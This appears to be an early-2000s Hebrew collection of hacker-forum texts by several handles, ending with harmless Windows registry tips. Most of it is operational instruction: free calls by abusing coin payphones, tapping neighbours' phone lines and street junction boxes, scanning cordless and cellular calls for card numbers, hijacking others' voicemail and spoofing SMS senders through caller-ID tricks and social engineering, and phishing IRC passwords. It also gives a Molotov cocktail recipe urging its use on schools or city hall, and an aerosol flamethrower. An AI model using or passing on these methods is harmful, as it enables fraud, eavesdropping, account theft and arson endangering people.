Busy Box - אמור להרוס את יכולת התקשורת של הטלפון אצל מי ששותלים את הקופסא.

 

Chartreuse Box - משתמש בחשמל בטלפון שלך למטרות אחרות לפפי בחירתך.

 

Cheese Box - *אמור להפוך את הטלפון שלך לטלפון ציבורי

 

Crimson Box - משמש ככפתור "המתן" לטלפון שללך.

 

Green Box - *נותן לך ליצור את הצלילים של Coin Collect, Coin Return,  Ringback

 

Neon Box - מוסיף מיקרופון נוסף לטלפון.

 

Noise Box - מוסיף רעש לקו.

 

Olive Box - משמש כפעמון נוסף לטלפון.

 

Red Box - *נותן לך לעשות שיחות חינם מטלפונים ציבוריים בארה"ב

 

Rock Box - מוסיף מוסיקה לקו הטלפון שלך, מהכרטיס קול או ממערכת סטריאו

 

White Box - חייגן צלילי טלפון נייד

 

By AiTi

המדריך המלא לסריקת תדרים באוויר

 

הקדמה: אני בטוח שחלקכם כבר קראתם טקסט שלי על סריקות,

אבל אז היה מדובר על סריקות של מספרי טלפון....

כאן מדובר על סריקות של תדרים באוויר, עולם חדש של ציטוט והאזנה,

שטח חדש של פריקינג...

 

1. מה זה Scanner???

סקנר הוא בעצם walkie talkie מאוד משוכלל

(ואל תתבלבלו עם סורק לניירות!)

 

2. מה הוא עושה???

סקנר הוא מכשיר שיכול לקלוט ולשדר מידע בתדרים שונים, כמו walkie talkie בעצם.

מה ששונה זה שסקנר יכול לקלוט מידע מאפילו 5 קילומטרים, בעוד שwalkie talkie

יכול לקלוט מידע ממקסימום 200 מטר.

 

3. מה סקנר יכול לעשות?

סקנר יכול להאזין לתדרים שונים באוויר, ואתה יכול לקלוט את השידורים הבאים:

 

רדיו

טלפונים אלחוטיים

טלוויזיה (קול בלבד)

טלפונים סלולריים אנלוגיים

רדיו קשר של משטרה

רדיו קשר של מכבי אש

רדיו קשר של מגן-דוד-אדום

רדיו קשר של חברות אבטח שונות (בתי ספר, אוניברסיטאות, מלונים וכו')

מוניות

מיקרופונים ניידים (כמו בתיאטרון)

 

כאשר אתה מאזין לטלפונים אלחוטיים/סלולריים

אתה יכול לקלוט מידע על אנשים, מספרי בזקכרט ומספרי כרטיסי אשראי.

 

4. אוקי, איפה אני יכול לקנות סקנר?

 

קודם כל צריך להבין שסקנר יכול לעלות בין 200 ל2000 ש"ח,

וקשה מאוד למצוא אותו בארץ למכירה.

אני מציע לקנות מאתרי מכירות פומביות כמו ebay.com או מהאתר של  uniden.com שם אני קניתי.

 

כמו כן אני ממליץ מאוד לקנות אנטנה מורחבת, שיכולה לתת לכם טווח כפול וזה ממש לא יקר.

 

5. איך אני יכול למצוא לאיזה מספרים אנשים חייגו בטלפון אלחוטי?

 

די פשוט...

רק צריך לקנות כבל של אוזניות שהוא זכר/זכר (תקע/תקע) ולחבר

את יציאת האוזניות של הסקנר לכניסת ה

audio in

של המחשב,

ולהפעיל את תוכנת זיהוי צלילי הטלפון (DTMF) שניתן

להשיג באתר.

 

6. לאיזה תדרים אני צריך להאזין?

 

אלפונים אלחוטיים: (לנסות להקשיב לאחד מ25 התדרים)

 

Handset Base  Channel

-------   ----     -------

   1      43.720   48.760

   2      43.740   48.840

   3      43.820   48.860

   4      43.840   48.920

   5      43.920   49.000

   6      43.960   49.080

   7      44.120   49.100

   8      44.160   49.160

   9      44.180   49.200

  10      44.200   49.240

  11      44.320   49.280

  12      44.360   49.360

  13      44.400   49.400

  14      44.460   49.480

  15      44.480   49.500

  16      46.610   49.670

  17      46.630   49.845

  18      46.670   49.860

  19      46.710   49.770

  20      46.730   49.875

  21      46.770   49.830

  22      46.830   49.890

  23      46.870   49.930

  24      46.930   49.990

  25      46.970   49.970

 

כדאי מאוד לנסות להקשיב לצד של הבסיס ולא לצד של הטלפון עצמו

 

השאר: כאן תראו את שאר התדרים האפשריים ומה הם מכילים.

התדרים הם במגה הרץ (MHZ) ולא בקילו הרץ

 72 עד 54 - -  טלוויזיה

 88 כד 108 - -  רדיו FM

108 עד 136 - - מטוסים

136 עד 144 - - צבא

148 עד 150.6 - - צבא

152 עד 153 - - מוניות

154 עד 155 - - מכבי אש

155 עד 156 - - משטרה

156 עד 158 - - ספינות

158 עד 160 - - משטרה

162 עד 174 - - ממשלתי

174 עד 220 - - טלוויזיה

453 עד 454 - - משטרה

458 עד 460 - - משטרה

By AiTi

פריצה לטלפונים שעובדים על מטבעות

 

הקדמה:

אני בטוח שחלקכם כבר שמעתם על שיטה זו או אחרת לשיחות חינם, גם אם השיטה הייתה במקור רעיון שלי...

השיטה הבאה תעבוד ב80% מהטלפונים, לא כמו שיטה אחרת שתעבוד אולי רק על 5%....

 

מה זה טלפון מופעל מטבעות CoCot?

 

אתם מכירים את הטלפונים הציבוריים שעובדים על מטבעות?

הם לא שייכים לבזק אלא שייכים לחברת התקשורת המחזיקה אותה, לבעל החנות שבה נמצא הטלפון וכו'..

אחת הבעיות עם הטלפונים האלו זה שאי אפשר להתקשר אליהם, אבל כן יש להם מספר.

מה שמיוחד בטלפונים האלו זה שהם עובדים על קו רגיל של בית/עסק ולא על

קו מיוחד כמו הטלפונים הציבוריים, בגלל זה יש כמה שיטות להרוויח באלה שיטות חינם...

 

אז הנה השיטה!:

%%%%%%%%%%%%%%

קודם כל תמצאו טלפון כזה שמופעל על כסף (בביה"ס, בקניון, בבית-חולים, במועדון וכו')

עכשיו תיגשו אליו ותחייגו מספר 1800 כלשהוא, או שתתקשרו ל199 וכו',

בדרך כלל הטלפון לא יצטרך כסף, אבל אם הוא כן יבקש אז תשלמו, הוא יחזיר את הכסף אחר כך...

כשיענו אז תתחילו להגיד שטויות, עד שינתקו לכם. (אל תנתקו בשום מקרה!)

מה אתם שומעים עכשיו אחרי שניתקו?

1.  Krench

2. צליל חיוג! (בפממממממ...)

 

מה קרה אתם שואלים??

 

כאשר אתם מרימים את השפורפרת בהתחלה תשמעו צליל חיוג מזוייף, שמיוצר על ידי הטלפון

ולא על ידי הפולסים בקו....

 

עכשיו יש לכם צליל חיוג ואתם יכולים להתקשר לכל מקום!

 

רגע, על מה אתה מדבר? שאני מנסה לחייג המקשים לא מגיבים!

זה היה אבטחה עלובה של הטלפון...

עכשיו יש לכם 2 אפשרויות:

 

1. לקנות Tone dialer מארה"ב, שעושה צלילי חיוג ואז תוכלו להשמיע את הצלילים לטלפון.

 

2. להשתמש בשיטת חיוג הישנה של פולסים.

השיטה עובדת כך:

כדי להקיש את הספרה 1 מקישים פעם אחת על כפתור הניתוק (איפה שמניחים את השפורפרת)

כדי להקיש את הספרה 2 מקישים שתי פעמים על כפתור הניתוק (איפה שמניחים את השפורפרת)

כדי להקיש את הספרה 3 מקישים שלוש פעמים על כפתור הניתוק (איפה שמניחים את השפורפרת)

מקישים על הכפתור לבערך רבע שנייה.

כדי להקיש 0 לוחצים 10 פעמים.

אתם יכולים לנסות את השיטה בטלפון בבית שלכם!

 

עכשיו אתם יכולים להתקשר לכל העולם!

תתקשר למספרי סקס, פלאפונים, כווית וסתם להתקשר לסין!

 

ועכשיו בונוס!

 

בונוס: כיצד לפרוץ לטלפונים מופעלי מטבעות             18.2.2001         

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

 

נכתב על ידי AiTi

 

ניסיתם פעם להתקשר לטלפון ציבורי? אפשר!

יש לו מספר שמופיע למעלה, מעל הטלפון...

אבל לcocot אי-אפשר להתקשר... (רק בשביל שבעלי הטלפון הזה ירוויחו כסף)

אבל זה לא אומר שאין לו מספר,

היחידים שמתקשרים למספר הזה הם החברה שבנתה את הטלפון, כדי לנהל אותו ולשנות לו הגדרות.

כדאי להשיג את המספר אתם מכניסים שקל לטלפון, מקישים 110, רושמים את המספר, הכסף יחזור אליכם,

ויש לכם את המספר!

כאשר אתם מתקשרים למספר הזה אתם תשמעו אחד משתי דברים:

 

1.  קול ממוחשב המבקש ממך להכניס את סיסמתך

2.  צליל של מודם מוזר (כן... מודם במהירות 300bps בתוך טלפון!)

 

במקרה הראשון אתם צריכים לנחש את הסיסמא, ואז תוכלו לשנות הגדרות.

ובמקרה השני אתם צריכים להתחבר לטלפון דרך היפר טרמינל וגם אז הטלפון יבקש סיסמא.

אחרי שפרצתם תוכלו בדרך גלל גם לשנות את המחיר של שיחה (5 אגורות?)

 

By AiTi

תדרים

רשימה של תדרים ברשת ה DTMF.

 

קבוצה נמוכה :

 

1,  2,  3,  A  < 967Hz

 

4,  5,  6,  B  < 770 Hz

 

7,  8,  9,  C  < 825 Hz

 

קבוצה הכי גבוהה

 

                      *            0              #        D      < 941 Hz

 

                        ^                      ^              ^                ^

1209Hz    1336Hz   1477Hz   1633Hz                          

 

& נא לעבור למצב אנגלית , CTRL+SHIF (שמאלי).

 

תודה ל: AiTi, Julian Macassey, N6ARE.

------------------------------------------------------------------------------------

הנה רשימה של מכשירים שניתן לצרוב את הקווים ואולי אם תהיו נחמדים אני יוציא על זה מדריך,

עוד איזה שנה אולי :-8

 

הרשימה:

 

Motorola SCN2025A: 4

Motorola SCN2034A: 4

Motorola TLN2574A: 4

Motorola TLN2659A: 4

Motorola TLN2724A: 4

Motorola TLN2726A: 4

Motorola TLN2733A: 4

Motorola TLN2734A: 4

Motorola TLN2777A: 4

Motorola TLN2867A: 4

Motorola TLN2879A: 4

Motorola 8000H: 4

Motorola Ultra Classic: 4

 

MEI HT5000: 3

Mercury 200: 2

Mitsubishi 460 XTAL: 2

Mitsubishi 555: 1

Mitsubishi 560: 1

Mitsubishi 600: 1

Mitsubishi 700: 4

Mitsubishi 800: 1

Mitsubishi 900: 1

Mitsubishi 1500: 1

Mitsubishi Mark 1 301: 2

Mitsubishi Mark 1 401: 2

Mitsubishi Mark 1 450: 2

Mitsubishi Mark 1 455: 2

Mitsubishi Mark 1 500: 2

Mitsubishi Mark 1 555: 2

Mitsubishi Mark 1 560: 2

Mitsubishi Mark 1 600: 2

Mobira ME-300: 1

Mobira ME-53A: 3

Mobira ME-57: 1

Mobira TPA 4/400: 1

Mobira TPA 5/500: 1

Motorola SCN2115A: 4

Motorola SCN2119A: 4

Motorola SCN2124A: 4

Motorola SCN2126A: 4

Motorola SCN2133A: 4

Motorola SCN2134A: 4

Motorola SCN2020A: 4

Motorola SCN2021A: 4

 

 

 

Diamondtel 200: 1

Diamondtel 90X: 1

Diamondtel 95: 1

Diamondtel Mesa 50: 4/2

Diamondtel Mesa 52: 4

Diamondtel Mesa 52A: 4

Diamondtel Mesa 55: 2

Diamondtel Mesa 55AX: 4

Diamondtel Mesa 55BX: 4

Diamondtel Mesa 60: 4

Diamondtel Mesa 60X: 4

Diamondtel Mesa 80: 4

Diamondtel Mesa 90X: 4

Diamondtel Mesa 95: 4

Diamondtel Mesa 99X: 4

DYNA TAC 2000: 2

Dyna Tac 2000X: 2

Dyna Tac 4000: 2

Dyna Tac 4500L: 2

Dyna Tac 4500XL: 2

Dyna Tac 6000: 2

Dyna Tac 6000X: 2

Dyna Tac 6000XL: 2

E.F. Johnson: 2

Fujitsu 170 PORTABLE: 1

Fujitsu 183-IIX: 1

Fujitsu FM80M-360: 2

Fujitsu FM80M-362: 2

Gateway CP 900: 1

GE Star: 2

Goldstar 5000: 1

Hitachi CR2100: 1

Hitachi CR2100H: 1

Alpine 9510: 1

Alpine 9511: 1

Amps ALL: 2

Antel Radiant 832XL: 2

Ara Pro-Comm 1800: 1

Astrotel 500: 1

Astrotel 580: 1

Astrotel 591: 1

AT&T 1710: 1

Audiote/Toshiba CMT500: 2

Audiotel BC-20: 2

Audiotel CMT-125: 2

Audiotel CMT-135: 2

Audiovox BC20: 2

Audiovox BC40: 1

Audiovox BC45: 1

Audiovox CMT-125: 2

Audiovox CMT-135: 2

Audiovox CMT1700: 1

Audiovox CMT400: 1

Audiovox CMT405: 1

Audiovox CMT450: 1

Audiovox CMT550: 1

Audiovox CMT600: 1

Audiovox CMT605: 1

Audiovox CMT750: 1

Audiovox CTX1500: 1

Audiovox CTX2500: 1

Audiovox CTX4000: 1

Audiovox CTX5000: 1

Colt Transportable: 1

Diamondtel 100: 1

 

By Pirs[i]ng

שיחות חינם בטלפונים שעובדים על מטבעות - שיטה ב

 

שיטה לעשות שיחות חינם בטלפונים של COCOT / Pirs[i]ng

COCOT הוא - "Customer Owned Customer Operated Telephone".

זאת אומרת - טלפון אשר נמצא במסעדה,ספריה, קניון וכו'.

יש בעיה בטלפונים האלה שאי אפשר לחייג אליהם, אבל בכל זאת יש להם מספר.

בזק לא מחזיקה את המכשירים האלה אלה בעל העסק שבו נמצא המכשיר.

המכשיר לא עובד על קו כמו של טלפון ציבורי לכן יש כמה שיטות להרוויח שיחות חינם,

פה אני יראה לכם שיטה שאני יודע שהיא עבדה פעם אבל לא בטוח שהיא תעבוד לכם עכשיו.

כי האנשים שמחזיקים את הטלפונים האלה כל יום נזהרים יותר יותר מפריקרים ושמים יותר לב לזה.

אז אם הטריק לא יעבוד אל  תשלחו לי דואר שזה לא עובד כי שום דבר לא מובטח.

לכו לטלפון המבוקש (COCOT בלבד).

חייגו לאחד המספרים שאתם מכירים באזור 1-800 (שיחות חינם).

המכשיר אמור להרשות לכם לקיים את השיחה.

התחילו לדבר עם מי שעונה לכם ודברו שטויות או משהו כזה,

תגרמו לו לנתק את השיחה קח שאתם לא נתקתם, אלא מי שדיברתם איתו.

לאחר מכן חייגו את המספר שרציתם מהתחלה וזה אמור לעבוד.

אם זה לא עובד פעם ראשונה נסו שוב אבל אם זה לא עובד הרבה פעמים אז וותרו כי זה לא יפעל.

 

&& תודה רבה ל - KoliChoice - חבר ותיק מאירופה.

 

By Prising

 

פריצה למשיבון סלולרי

 

כל הכתוב כאן הוא ללימוד החומר ואין להשתמש בו, כל דבר אשר יקרה לכם או לחבריכם לא

באחריות הכותב.

 

אתם בוחרים מספר כלשהו, נגיד הוא:

053000000

052000000

058000000

אתם הולכים לטכנאות של הפלאפון (דרך קוד טכנאי של המכשיר)

מוצאים את השורה של המספר ומשנים אותו למספר המבוקש אם שינוי קטן.

אם הוא היה

052 - 000 - 000

 |     |     |

2352  000   000

 

053 - 000 - 000

 |     |     |

2353  000   000

 

058 - 000 - 000

 |     |     |

2358  000   000

 

הסבר פורט יותר :

235 - אזור סלקום

3,5,8 - הספרה האחרונה בקידומת

000000 - המספר כרגיל

 

 

אתם משנים למספר שרציתם ואז מתקשרים לשירות לקוחות : *123

אתם אומרים: שלום, יש לי משיבון ושכחתי את הסיסמא, אפשר לברר אצלכם או אולי לאפס לי הסיסמא

של המשיבון או משהו כזה (דברו רגיל וחופשי), היא אומרת מה המספר שאתה מדבר ממנו (יש להם שיחה מזוהה),

אתה עונה את המספר שכתבת בטכנאות של הקוד רק את *המספר המקורי היא אומרת הוא יאופס תוך 10 דקות

(הקוד יהיה 1234). אתה אומר: טוב תודה, להתראות.

----------סוף----------

 

 

* אם כתבת 2353000000 אתה מחזיר אותו למקור, 053-000000.

ואז מאיזה מכשיר שאתם רוצים אתם מתקשרים ויודעים את הסיסמא של המשיבון של הקו שבחרתם.

 

טיפים - תתלבשו על מכשירי על טוקמן, כי שואלים פחות שאלות זה יותר קל לתחמון.

עכשיו שירות הלקוחות של טומקן זה *779.

 

בונוס אם רשמתם בטכנאות של הפלאפון מספר של מכשיר טוקמן אתם גם תמיד יכולים להתקשר ל *777

ולברר מצב חשבון עדכני של הקו. אבל זה לא תמיד עובד, תלוי בקו ובמכשיר.

 

By Pirsing


זיוף מספר השולח בשילחת ההודעות

 

מצרכים דרושים:

& מכשיר פלאפון נוקיה 5120/6120 בקו סלקום גירסא I.

& (גירסא I היא שבתפריט הודעות טקסט מופיעה האפשרות כתיבת הודעות, אין אותה בגירסא A)

&& (אם אינה נתנת האפשרות במכשיר לשלוח הודעות כתובות אנא סגרו את החלון)

--------------------------------------------------------------------------------------------

יאללה לעבודה :

1. הולכים לטכנאות של הפלאפון (דרך קוד טכנאי של המכשיר) שהוא: 3001#12345#*

2. מוצאים את השורה של המספר ומשנים אותו למספר המבוקש אם

שינוי קטן. כתבתי על זה במדריך על פריצה למשיבונים אבל הנה תזכורת.

המספר הוא:

052000000 -->> 2352000000<

053000000 -->> 2353000000<

058000000 -->> 2358000000<

4. משנים את השורה ושומרים ויוצאים, מפעילים את המכשיר מחדש.

&&& כדי לוודא שהכל עובד נכון אנא חייגו לאחד המספרים הנזכרים למטה,

 אם קבלתם צליל חיוג אתם בסדר.

*777 (טוקמן בלבד).

*779 (טוקמן בלבד).

*123 (כל הלקוחות).

לא חובה אבל אפשרי, אם לא קיבלתם צליל נורמלי אז בדקו את המספר שכתבתם באבטחה ואת המספר שחייגתם.

אם עדיין יש בעיות אז כנראה היא במכשיר אבל אם לא אז שלחו לי אימייל ונראה מה קורה.

 

יאללה נמשיך:

5. לכו ל :

תפריט, הודעות, הודעות טקסט, כתיבת הודעות.

כתבו הודעה (מה שבא לכם).

עכשיו משהו כדי שתדעו לידע אישי.

&&&& כאשר ההודעה תגיע לנמען המספר השולח יהיה זה שכתבתם בקוד טכנאי.

כמו כן יש לוודאות שהמצב של הקו שאתם שולחים ממנו (יותר ממנו עליו) לא במינוס בחשבון.

&&&&& כמו שאמרתי טוקמן תמיד עדיף. פחות מורכז ופשוט יותר !

 

<---------------------------------------------------------------------------------------->

עכשיו אני הולך להגיד משהו שקצת ירתיע אתכם אבל זה שטויות, מנסיון אישי !

יש סיכוי קלוש ביותר שדווקא תתבצע עוד קבלת-שליחת נתונים על הקו שעליתם עליו,

אז יש סיכוי שיעלו עליכם אבל לא יאתרו אתכם אבל כמו כן יבדקו של מי המכשיר

ואז יבואו אליכם אבל לא לפחד יש דרכים לצאת מזה:

1. גנבו לי את הפלאפון והרגע מצאתי אותו.

2. איזה חבר שלי שיחק אותה מבין ועשה לי איזה שינויים בו לא ידעתי מה הוא עושה.

3. איבדתי את המכשיר ורק עכשיו מצאתי אותו.

אבל כל זה סיכוי של 1 למיליון שזה יקרה אבל אלה שקוראים את המדריכים שלי צריכים לדעת הכל.

<---------------------------------------------------------------------------------------->

 

By Pirsing

 

Beige Box

 

הערות: אני לא אחראי לכל שימוש בחומר הכתוב כאן, חומר זה הוא

למטרות לימודיות בלבד ו--++אין++-- להשתמש בו!

 

מי שמתחיל בפריקינג שיקרא קודם כל את הטקסט שאלות תשובות.

 

מה זה Beige Box??

+++++++++++++++++

Beige Box היא קופסא המאפשרת לך להתחבר לקווי טלפון של אנשים אחרים,

להתקשר על חשבונם, ולצותת לשיחות שלהם.

 

מה אני צריך כדי לבנות את הקופסא?

++++++++++++++++++++++++++++++++

יש שתי שיטות להשתמש בקופסא: אחת בדירות דרך הקיר, והשנייה דרך קופסאת הטלפון הראשית

שנמצאת ברחוב (אתם מכירים את הקופסאות הגדולות האלה ברחוב שיש עליהם סמל של בזק, נכון?).

 

חומרים לשיטה הראשונה:

@ פטיש

@ חוט טלפון

@ מלחם

@ שקע טלפון חדש ל מחובר

@ פנס

@ קצת בדיל

@ טלפון

@ קצת חוש טכני...

 

חומרים לשיטה השנייה:

% טלפון

% חוט טלפון

% מברג עם ראש שטוח

% פנס

% קצת חוש טכני...

 

כיצד לבנות

&&&&&&&&&&&

 

השיטה הראשונה תוסבר בהסבר על השימוש.

 

שיטה שנייה:

קחו את חוט הטלפון, וחברו אותו לטלפון. (זה היה קשה נכון?)

 

שימוש

^^^^^^

שיטה ראשונה:

קודם כל תחתכו את חוט הטלפון שלכם והפרידו בין החוט הירוק לאדום.

תמצאו את קופסת החשמל הכללית שלו וסגרו לו את החשמל. (אתם לא רוצים להתחשמל)

אחר-כך קחו את הפטיש ותשברו חלק מהקיר המשותף, בחלק התחתון.

הסתכלו פנימה עם פנס, ותחפשו חוטי טלפון.

אחרי שמצאתם תלחימו את החוט הירוק עם החוט הירוק שלכם, ואת החוט האדום עם החוט האדום שלכם.

קחו את החוט שלכם וחברו את הקצה השני לטלפון שלכם. הרימו את השפורפרת, שומעים צליל חיוג?

אם כן אז תחזירו לשכנים את החשמל שלהם.

(שיטה זה יכולה לעבוד בשינויים קלים גם כדי לגנוב חשמל וכבלים)

 

שיטה שנייה:

לכו אל הקופסאת טלפון של בזק.

פתחו אותה (חלקם לא יעבדו כי יהיה צריך מפתח) בעזרת המברג.

חברו את חיבור הטלפון לאחד משקעי הטלפון.

אם אתם שומעים צליל חיוג הישארו בחיבור הזה, אם לא אז תחברו לבא אחריו.

השיטה הזה תעבוד גם בחיבור של בית בודד בלבד, אך בדרך כלל צריך סולם בשביל זה.

 

מה לעשות אחרי שהתחברתי?

************************

קודם כל תתקשר  למספר ANI שהוא בישראל 110 ותגלו מה המספר של מי שהתחברתם אליו.

עם מישהו מדבר בקו הזה אתם יכולים להישאר ולהאזין, אך עם הקו לא בשימוש אתם יכולים להתקשר לכל מספר שאתם רוצים ($$$Sex).

 

 

הערות קטנות לסיום: *אני לא אחראי לכל שימוש בחומר הכתוב כאן, חומר זה הוא למטרות לימודיות בלבד                   ו--++אין++-- להשתמש בו!

                  * כל הכתוב כאן הוא בלשון זכר אך מכוון לכולם, היתיי יכול לכתוב אחרת אבל נראה                   לי שאין בכלל בישראל פריקריות.

 

 

By AiTi

Mirc פריצת חדרים ב

 

למה לי ללכלך את הידיים וליפרוץ לחדר....???

 

(אם אין לכם את הסיבה הזאת... או אחרת ששווה... אל תיפרצו זה לא שווה את המאמץ...)

 

ת= תיראו.. נגיד.. שיש איזה אופ בחדר גדול.. והאופ הזה.. זורק אותכם בגלל שלא יודע... אמרתם משהו על הפוקימון שהוא אוהב.... נגיד אז הוא זורק אותכם.... (זאת הסיבה הכי מומלצת לפרוץ לחדרים... זה והיתערבות...)

אז בכל אופן הוא זורק אותכם ואתם רוצים להחזיר לו..

 

ש= נו... אז איך אני מחזיר?!?!

ת= זה הטקסט.. דבר ראשון.... צריך למצוא סרבר... אבל כזה שאולי ויפול לכמה שניות.. אחרי שמצאתם אחד כזה (נורא קשה לימצוא!!!) אתם פותחים שם את החדר ומשיגים אופ.. תירשמו שם את החדר זה נותן מעמד של פאונדר....

בכל אופן... שהשרת יפול.. (Split) אתם תוכלו לחזור לשרת שהוא יחזור...

ואז להיתחבר לשרת של החדר... ונחשו מה? יהיה לכם שם אופ!!! כן כן כן!!!

By ^DaK0Da^

Mirc פריצת ניקים ב

 

יש כמה דרכים... אני יגיד 3 ושלושתם דורשים כושר שיכנוע מסויים...,

אתם רק צריכים איזה אחד פרייאר... אבל ממש פרייאר.... כזה שאם תגידו לו להיזדהות לניק אצל הבוט החדש שלכם הוא יעשה את זה טוב...

OoOoOoOoOoOOoOOOooooooooOOooooOoOOOOOOoooOOOooOOOooOOOOo

 

דרך א- (אנ'לא בטוח שזה עובד...)

זה אמור ללכת ככה:

 

<You> Yo, Fuck Man...

<@Fuck-Man> ?

<you> plz... chak It Out... alt+0266 On Your Number pad...

<@Fuck-Man> Fine...

<@Fuck-MAN> n12snfokk

<you> nice password ass hole!!!

 

OOOoooOOOOOOooOOOooOOOOooooOOOoooOOOOooooOOOOOoooOOOooo

דרך ב- (לא יעבוד על כאלו שמבינים...)

 

ליכתוב דוגמא לסקריפט (רק למי שיודע...)

לישלוח לקורבן ולהגיד לו לבדוק את ההיזדהות האוטומטית... (auto-identify)

הפקודדה צריכה להראות כך...

 

Auto-Ident:/msg MemoServ send <your nick> $$?="password to auto-identify?"

 

תגידו לקורבן לשים את זה בא פופאפ... (הוא חייב להיות דביל...)

 

OOOoooOOOOOooOOOOoooOOOoooOOOOOooOOOOooooOOOOooOOOOooo

 

עוד אחד... זה ממש צריך להיות ילד פרייאר כדי שזה יעבוד...:

<|[You]|> y0 zero33

<zero33> Yeah?

<|[You]|> Here's the new bot. I'm setting up accounts now. he Will Bild A server For You.

 

Msg it this-

add+protected user <your nick> <your nick's password>

<zero33> ok

 

הערה:

 

למבינים בסקריפטינג... כדי לבנות בוט ולא להוריד אחד... כי אז.. לא יאמינו לכם.. אם אתם מורידים אז

תורידו אחד מהאלה של www.mircx.com

תיבחרו אחד מהאמצע כדי שאף אחד לא יזהה...

 

By ^DaK0Da^

 

 

בקבוק תבערה

 

(הכי פשוט זאת השיטה הכי פשוטה והכי טובה שיש...):

 

חומרים:

 

א- בקבוק זכוכית... (מומלץ של בירה כדי שיהיה מה לשתות לפני..)

ב- מפית נייר פשוטה...

ג- בקבוק של אלכוהול...

ד- זריזות...

 

אופן הביצוע:

 

שתו את כל הבירה ואל תנקו את הבקבוק!!!...

אחרי זה שימו הרבה הרבה הרבה אלכוהול בפנים (אפשר עד החצי.. הכי טוב...)

ומפית נייר... (שחלק מהמפית יהיה בחוץ...)

שרפו את הקצה של המפית... וזרקו את הגפרור...

לתוך הבקבוק.

 

החלק היפה...

 

עכשיו זרקו את הבקבוק ממש מהר..

ושתיי דברים אולי יקרו:

1- הוא יתפוץ באוויר להרבה הרבה רסיסים מהחום...

2- הוא ישרוף כל דבר שהוא יגע בוא...

 

בכל מקרה זה ס22ה לזרוק את זה בתוך הבית ספר היסודי שלכם..

או בבית ספר הנוכחי שלכם...

 

או סתם ליד בניין העיריה..

בכל אופן אני סומך עליכם שתהנו...

 

By ZeBrA

Flame Machineאיך לבנות לביור

 

“The girl is mine” - Micheal Jackson

 

מה שלומכם ? אצלי הכל טוב ...

 

השיטה היא ישנה ומוכרת, כתבתי את הטקסט כדי להבהיר כמה נקודות שוב ...

 

חומרים :

 

1. ספריי ( כמו ביום העצמאות - המזויפים הם הכי טובים ) .

2. מצית ( אפשר קטנה אבל עדיף את המצית הענקית שפעם לפני שהיו תנורים חשמליים השתמשו במטבח - אפשר להשיג בקו-אופ ( פעם שיחקתי עם זה בסופר והאבטחה בא עלי - להוריד פרופיל).

3. אומץ - אני לא אחרי אם נשרף לחברה שלכם השער (: .

 

שיטה א - עובדת עם ספריי בלחץ נמוך ...

 

להתחיל להשפריץ ספריי לקרב בעדינות את המצית והכל מתחיל להיות חם ... שרוף ... אש ... - כלומר ברגע זה יש לכם לביור- עם לביור זה אפשר לשרוף דשא, שוטר ואפילו את בן-לאדן השובב.

 

שיטה ב - עובדת תמיד

 

לסיים את הבקבוק ולדאוג שהבקבוק ישפריץ אוויר, לקרב את המצית בשיא הזהירות לאוויר והינה יש לכם לביור. יש להזהר נורא בשיטה זאת משום שאנשים טועים וחושבים שהאוויר הזה לא יביא ללהבה גדולה אבל ... תנסו ותראו (:  .

 

מה לעשות עם הלבן של הספריי כשהוא על הרצפה ?

 

אפשר להדליק אותו, הוא דליק נורא . אני ממליץ לעשות קו ארוך של ספריי ולהדליק ... (בסוף הקו אפשר להניח כמה נפצים ... או איזה טיל טומהוק (: ואז יהיה לכם מצב רוח פ33ות ) .

 

By Razor \ Old-Hacker

  Windows Tricks Part 1

המדריך הזה יספר לך כיצד תוכל לשנות מלא דברים במערכת הפעלה ה"מהוללת" – Windows באמצעות עורך הרג'יסטרי (רישום המערכת), וכמו כן גם טיפים וטריקים שונים בנוגע לדברים שיכולים לעזור לך בשעה שאתה משתמש במערכת ההפעלה הזאת (שלדעתי שווה לזב...)

(לא אין הכוונה לפיצוח סיסמת WINDOWS אם חשבת במקרה שהמדריך עוסק בכך...)

 

השקעתי הרבה שעות בכתיבת המדריך הזה ואני מקווה שתהנה ממנו כמו שאני נהניתי לכתוב אותו. חלק מהדברים פה נכתבו למשתמשים מתחילים מאוד וחלק למשתמשים מתקדמים אני מקווה שתפיקו ממנו את הרוב.

המדריך נכתב מחומר שאספתי מאתרים שונים בנוגע לכך במשך השנים האחרונות וגם מידע אישי שלי לכן אל תופתע אם תראה דברים באתרים אחרים שכבר ראית פה.

לכל מי שמתכנת בשפות תכנות (לדוגמת VB ) , שינסה להפעיל חלק מהשיטות המוצעות פה דרך תוכנית מסוימת שתפעיל את הרג'יסטרי . זה יכול להיות תרגול נחמד בהחלט, מי יודע אולי מתישהו אני יכין תוכנית כזאת...

 

אזהרה: מדריך זה יכול לפגוע קשות במערכת ההפעלה  ו \ או לגרום לפעילות בלתי חוקית, הוא נכתב למטרות לימודיות בלבד ולכן אם אתה מתכוון להשתמש בו זה על אחריותך הפרטית בלבד אני לא לוקח אחריות לכל דבר שתעשה בשימוש במדריך זה בכל אופן שהוא חוקי או לא חוקי!!

 

ידע נדרש:

-עדיף שתדע להשתמש קצת בעורך הרג'יסטרי שלך (REGEDIT.EXE ) שנמצא תחת תיקיית WIN98 או WINDOWS וניתן להפעלה אם תלחץ על "התחל" = > הפעלה => ותכתוב REGEDIT , ההפעלה שלו די מזכירה את ה"סייר" של המחשב- אז תלמד להשתמש גם בו , דבר פשוט בהחלט. וכמו כן גם כדאי שיהיה לך ידע כללי בתכנות רק בשביל שתבין בערך מה אתה עושה.

 

כל המידע נכתב למערכת windows 98/95 בעברית אך הוא מתאים גם לגרסה האנגלית!

זכור לגבות \ לזכור כל שינוי שאתה עושה כדי שתוכל להשיב את המצב לקדמותו!

הכפתור הימני של העכבר באינטרנט אקספלורר

תגיד , אתה לא שונא שיש אתרים מעצבנים קרציות שלא נותנים לך ללחוץ על הכפתור הימני של העכבר באמצעות סקריפט, ובכן אל תתעצבן.

 

אם אתה מגיע לאתר כזה פשוט עמוד במקום שבו אתה רוצה ללחוץ על הלחצן הימני ולחץ על הכפתור שמתחת לכפתור Shift (כן זה עם הציור של העכבר). איזה יופי , הלחצן הימני עובד.

 

משתמשים עם עכבר בעל לחצן אמצעי פשוט יכולים להתעלות על הסקריפט באמצעות לחיצה רצופה על הלחצן האמצעי ולאחר מכן לחיצה על הלחצן הימני.

 

כמובן שאפשר להתעלם פשוט מהג'אווה באתר באמצעות INTENET EXPLORER ע"י

כלים > אפשרויות אינטרנט > אבטחה > רמה מותאמת אישית

ושנה שם כך ששום סקריפט JAVE או JAVA SCRIPT יפעל, פשוט מאוד...

 

הפסקת הפעלה אוטומטית של ה CD

